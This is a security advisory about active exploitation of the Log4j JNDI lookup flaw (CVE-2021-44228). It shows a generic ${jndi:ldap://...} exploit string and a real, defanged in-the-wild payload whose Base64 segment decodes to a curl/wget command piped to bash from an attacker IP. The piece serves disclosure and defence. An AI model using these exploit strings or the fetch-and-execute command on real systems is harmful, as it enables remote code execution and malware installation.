Critical Apache Log4j vulnerability being exploited in the wild

December 12, 2021

This vulnerability exists in Log4j's lookup substitution. When a logged string contains a lookup of the form ${jndi:...}, the library resolves it through the Java Naming and Directory Interface (JNDI); with an LDAP URL, the attacker-controlled LDAP server answers the lookup with a reference to a remote class file, which the vulnerable application retrieves and executes locally. Several proofs-of-concept and vulnerability walkthroughs have already been published. The vulnerability can be triggered by getting a string like the example below into any message that the application logs:

    ${jndi:ldap://attacker_controlled_website/payload_to_be_executed}

The Kenna Risk Score for CVE-2021-44228 is 93 out of 100, an exceptionally rare score reflecting the severity and potential impact of this vulnerability. Analysts are currently observing widespread active exploitation across telemetry. Below is an example of one of the exploitation attempts analysts have observed in the wild (indicators are defanged: "[.]" stands for "." and "[:]" for ":"):

    ${jndi:ldap://45.155.205[.]233[:]12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK}

The Base64-encoded segment of the path is the shell command the attacker wants run on the victim; it is responsible for the delivery and execution of additional malicious payloads. Decoded, it reads:

    (curl -s 45.155.205[.]233[:]5874/[victim IP]:[victim port]||wget -q -O- 45.155.205[.]233[:]5874/[victim IP]:[victim port])|bash

In many cases, following successful exploitation, victims are being infected with cryptocurrency mining malware.